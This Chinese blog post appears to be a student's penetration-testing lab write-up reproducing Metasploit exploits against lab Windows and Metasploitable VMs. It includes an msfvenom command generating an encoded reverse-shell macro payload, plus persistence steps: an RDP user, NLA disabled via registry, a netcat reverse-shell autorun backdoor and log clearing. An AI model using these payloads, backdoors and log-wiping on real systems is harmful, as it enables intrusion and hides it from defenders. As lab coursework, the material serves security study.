网络攻防实验 -- 渗透测试作业三

news/2024/10/29 21:07:41/文章来源:https://www.cnblogs.com/chchee-blog/p/18514454

目录
  • 漏洞复现:
    • 1.利用宏病毒感染word文档获取shell复现
    • 2.实现CVE-2020-0796永恒之黑漏洞利用
    • 3.实现Microsoft Windows远程溢出漏洞CVE-2012-0002利用
    • 4.实现MS11-003(CVE-2001-0036)漏洞利用
    • 5.实现IE浏览器的极光漏洞利用
    • 6.实现Adobe Reader 9漏洞利用
    • 7.渗透攻击Metasploitable的Vsftpd源码包后门漏洞
    • 8.使用browser_autopwn 模块渗透攻击浏览器

漏洞复现:

1.利用宏病毒感染word文档获取shell复现

https://www.offsec.com/metasploit-unleashed/vbscript-infection-methods/

A macro is a feature that allows users to create automated processes inside of a document used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user experience, increase productivity, or automate otherwise manual tasks. But, in other words, it executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter session!

One memorable example of a macro-malware is the Melissa virus, which first appeared in 1999. The malware was embedded in an MS Word file and when opened, would e-mail itself to the first 50 contacts in the victim’s address book. Though it didn’t cause much damage to individual users (aside from accidentally causing several mail services to DDOS), the total worth of damages caused was estimated at 80$ million, and the attacker was sentenced to 20 months in federal prison.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe -o output.txt

image-20241026170015869

the script is in two parts. The first part of the script is created as a macro and the second part is appended into the document text itself.

You will need to transfer this script over to a machine with Windows and Office installed .

创建宏

image-20241026172335912

将生成的宏复制到此处:

image-20241026171241958

将生成的第二部分即文档内容粘贴到word文档中

image-20241026171612062

宏文件生成完毕

需要另存为启用宏的Word 文档

image-20241026172926890

打开生成的文档,需要开启宏

image-20241026173145041

设置 Metasploit 监听

image-20241026170658770

成功 getshell

image-20241026172141269

2.实现CVE-2020-0796永恒之黑漏洞利用

https://blog.csdn.net/weixin_63610715/article/details/133847253

https://www.cnblogs.com/kbhome/p/13073746.html

https://www.cnblogs.com/jihejihe/articles/16899783.html

原理分析:https://www.jamf.com/blog/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-poc-jamf-threat-labs/

https://github.com/jamf/CVE-2020-0796-RCE-POC

SMB远程代码执行漏洞(CVE-2020-0796)

该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,没有检查长度是否合法,最终导致整数溢出,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

环境:

攻击方kali:192.168.137.130

受害机win10: 192.168.137.133

端口扫描,开放445端口,提供smb服务

image-20241026191628781

检测是否存在漏洞:

工具下载地址:https://github.com/eerykitty/CVE-2020-0796-PoC

image-20241026182152155

image-20241026182132315

识别目标主机的smb版本 use auxiliary/scanner/smb/smb_version

image-20241026192534501

image-20241026193008115

image-20241026192949089

加载模块

image-20241026193329865

image-20241026193612134

添加丢失文件 \# unzip external.zip -d /usr/share/metasploit-framework/

image-20241026195145272

后渗透维持权限

后渗透的目的是长久保持对目标的权限,主要手段是植入后门

background : 把当前连接保存到后台不退出连接

加载后渗透模块enable_rdp 创建目标主机RDP用户

image-20241026200035104

如果目标主机开启NLA,建立的RDP账号将不能通过RDP连接到目标主机

查询目标机注册表来确定是否开启了 NLA。

image-20241026200617924

根据查询结果 SecurityLayer(2 )和 UserAuthentication (1)的值,可以知道目标机开启了 NLA以上说明目标主机上的NLA(网络级身份验证)处在开启状态,不能够直接用rdp连接目标主机。

reg -h # 查看帮助-k #注册表的路径 -v 键的名称 -d 键值reg enumkey [-k <key>] # 枚举注册表的内容reg createkey [-k <key>] # 创建注册表项reg deletekey [-k <key>] # 删除注册表项reg setval [-k <key> -v <val> -d <data>] # 在注册表里添加内容reg deleteval [-k <key> -v <val>] # 删除注册表的值reg queryval [-k <key> -v <val>] # 查询注册表的值

通过修改注册表将 SecurityLayer 和 UserAuthentication 的值修改为 0,就可以关闭NLA。

image-20241026201026153

rdesktop 192.168.1.60 -u test -p 123456 建立 rdp 连接

image-20241026201231996

远程桌面连接成功

image-20241026201302071

修改注册表启动项长久维持权限

直接利用漏洞获取目标权限不稳定,为长久的获取目标主机的权限,需要通过植入后门来实现。

通过已获取的权限上传后门

后门可以是MSF生成的,甚至可以是勒索病毒。这里使用nc.exe作为后门

nc 参数解释:L 用户退出后重新进行端口侦听d 后台运行p 指定端口-e 连接后执行的程序

在kali主机上利用已经获取的shell上传nc.exe

注册表添加启动项执行 nc 反弹 shell 命令

运行shell,执行windows命令修改防火墙

image-20241026202303867

重启win10,kali开一个新终端:

检查端口开放,443处于监听状态

image-20241026202800577

成功获得 shell

image-20241026202912801

上传木马后让木马自动运行的方式:注册表自启动项、添加计划任务、注入到常用的exe文件等等

删除 windows 日志

eventvwr.exe

image-20241026204122090

删除日志:

一是在获取权限后直接使用meterpreter的删除日志命令:clearv

二是利用专门编写的删除windows日志文件的批处理文件删除日志

查杀木马

检查可疑连接端口及进程

image-20241026204554303

查找进程对应的程序名称 ,删除木马文件

tasklist |findstr <PID> , taskkill /PID <PID>

image-20241026205047110

3.实现Microsoft Windows远程溢出漏洞CVE-2012-0002利用

漏洞针对 win7、windows XP, windows server 2008 等系统的3389远程桌面服务(RDP)

win7 开启远程桌面设置

image-20241019095751263

services.msc

image-20241023160529898

网络信息

  • win7 ip:192.168.137.129
  • Kali ip:192.168.137.130

搜索对应活跃主机win7蓝屏漏洞端口

nmap 扫描win7端口

image-20241024205714309

Nessus 执行漏洞扫描

/bin/systemctl start nessusd.service

image-20241024210609781

msfconsole 加载攻击模块

image-20241024210057874 image-20241024210831582 image-20241024210928231

攻击成功

image-20241024210954878

4.实现MS11-003(CVE-2001-0036)漏洞利用

MS11-003 漏洞主要影响以下 Windows 服务:

  • Remote Procedure Call (RPC):该漏洞涉及 RPC 服务的实现。RPC 是 Windows 系统中用于进程间通信的核心组件。
  • Server Message Block (SMB):该协议用于文件共享和打印服务,漏洞可能通过 SMB 实现的 RPC 连接进行利用。

msfconsole查找攻击模块

image-20241026212151371

run 开始攻击

image-20241026213523814

生成恶意网站server 地址:http://192.168.137.130:8080/DuUOHssks2, win7 虚拟机 通过IE浏览器访问上述恶意网站

image-20241026213431884

成功 getshell

5.实现IE浏览器的极光漏洞利用

https://hstar.me/2019/06/aurora-analysis-2/

https://hstar.me/2019/06/aurora-analysis-1/

https://bbs.kanxue.com/thread-247763-1.htm

查找极光漏洞攻击模块

image-20241026214908496

恶意网址:http://192.168.137.130:8080/L8XkQqOqMeLl

image-20241026215020425

win7 访问恶意网址:

image-20241026215231234

成功getshell

image-20241026215335346

6.实现Adobe Reader 9漏洞利用

加载攻击模块

image-20241027140606641

加载监听模块

image-20241027141441806

成功getshell

image-20241027141609990

7.渗透攻击Metasploitable的Vsftpd源码包后门漏洞

加载攻击模块

image-20241027143609898

getshell

image-20241027143451586

8.使用browser_autopwn 模块渗透攻击浏览器

Browser Autopwn 是由Metasploit提供的一个辅助模块。
当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。

image-20241026220301245

生成恶意网址

image-20241026220528954

受害机访问恶意网站后,开始攻击

image-20241027114930131

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/823862.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2024网鼎杯初赛-青龙组-WEB gxngxngxn

WEB01 开局随便随便输入都可以登录,登上去以后生成了一个token和一个session,一个是jwt一个是flask框架的 这边先伪造jwt,是国外的原题 CTFtime.org / DownUnderCTF 2021 (线上) / JWT / Writeup 先生成两个token,然后利用rsa_sign2n工具来生成公钥python3 jwt_forgery.py…

网络攻防实验 -- 渗透测试作业一

一 nmap命令 SERVICE/VERSION DETECTION:-sV: Probe open ports to determine service/version infoHOST DISCOVERY:-sn: Ping Scan - disable port scan # 检测主机是否在线,不显示任何端口信息。1.使用nmap搜寻网络内活跃的主机2.使用nmap扫描目标主机端口信息和服务版本号3.…

手机app开发用的是什么语言有哪些优势

手机APP开发是一项涉及多种编程语言的任务。开发者可以根据需求、平台以及个人偏好选择合适的语言。手机app开发用的语言有:1、Java;2、Kotlin;3、Swift;4、JavaScript/TypeScript;5、Dart。作为Android平台的主要开发语言,Java拥有庞大的开发者社区和丰富的开源库。它的…

代码随想录一刷-day3

T209 长度最小子数组 核心:滑动窗口思想,如何用一个for循环达到两个循环的效果 for(int j=0;j<num.size();j++){ sum+=nums[j];//外层for循环内负责将窗口结束的坐标++; while(sum>=target){window_length=j-i+1;result=min(result,window_length);sum-=nums[ i++ ]; …

IDEA如何在线安装一个插件,超简单

前言 我们在使用IDEA开发Java应用时,经常是需要安装插件的,这些各种各样的插件帮助我们快速的开发应用,今天,就来介绍下如何在IDEA中安装插件。 那么,我们该如何安装插件呢? 如何安装插件 首先,我们打开设置面板。然后,我们点击【Plugins】,我们再在右侧点击【Marketp…

【Azure Bot Service】部署Python ChatBot代码到App Service中

问题描述 使用Python编写了ChatBot,在部署到App Service,却无法启动。 通过高级工具(Kudu站点:https://<your site name>.scm.chinacloudsites.cn/newui)查看日志显示:Failed to find attribute app in app.2024-10-25T02:43:29.242073529Z _____ …

系统类型中的标准、VHD和VHDX是什

系统类型中的标准、VHD和VHDX是指计算机系统中的不同类型和格式。标准系统类型是指常见的操作系统,如Windows、Linux和macOS等,它们具有广泛的应用和用户基础。VHD(Virtual Hard Disk)和VHDX是虚拟硬盘的文件格式,用于在虚拟化环境中模拟硬盘存储。标准系统类型是操作系统…

Vue基础–v-model表单

v-model的基本使用基本使用<!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</titl…

测试方法

测试方法分类 静态测试方法不执行程序的测试方法 主要用于测试文档和代码 静态测试包括评审和静态分析方法 可使用一些静态分析工具动态测试方法通过运行程序来发现缺陷的测试方法。黑盒测试方法(不涉及程序内部接口)功能测试,数据驱动测试,基于说明书的测试 从用户观点出发…

基于Material Design风格开源、免费的WinForms UI控件库

前言 今天大姚给大家分享一个基于 Google 的 Material Design 风格开源、免费的.NET WinForms UI控件库:MaterialSkin。 WinForms介绍 WinForms是一个传统的桌面应用程序框架,它基于 Windows 操作系统的原生控件和窗体。通过简单易用的 API,开发者可以快速构建基于窗体的应用…

babel基本概念

是前端开发环境必备工具。用于把ES6语法转换为ES5、ES4,兼容不同浏览器。 - 环境搭建 & 基本配置 安装一些插件、配置.babelrc。通过plugins里面的东西转换语法。preset-env是一堆plugin的集合。npx babel src/index.js - babel-polyfill 浏览器补丁。core-js标准的库,集…

高级程序语言设计课程第五次个人作业

2024高级语言程序设计:https://edu.cnblogs.com/campus/fzu/2024C 高级语言程序设计课程第五次个人作业:https://edu.cnblogs.com/campus/fzu/2024C/homework/13298 学号:102400213 姓名:范自亮 第八章 8.11.18.11.2 问题:不知如何输出\n、\t 解决方案:网上查询8.11.38.11.48…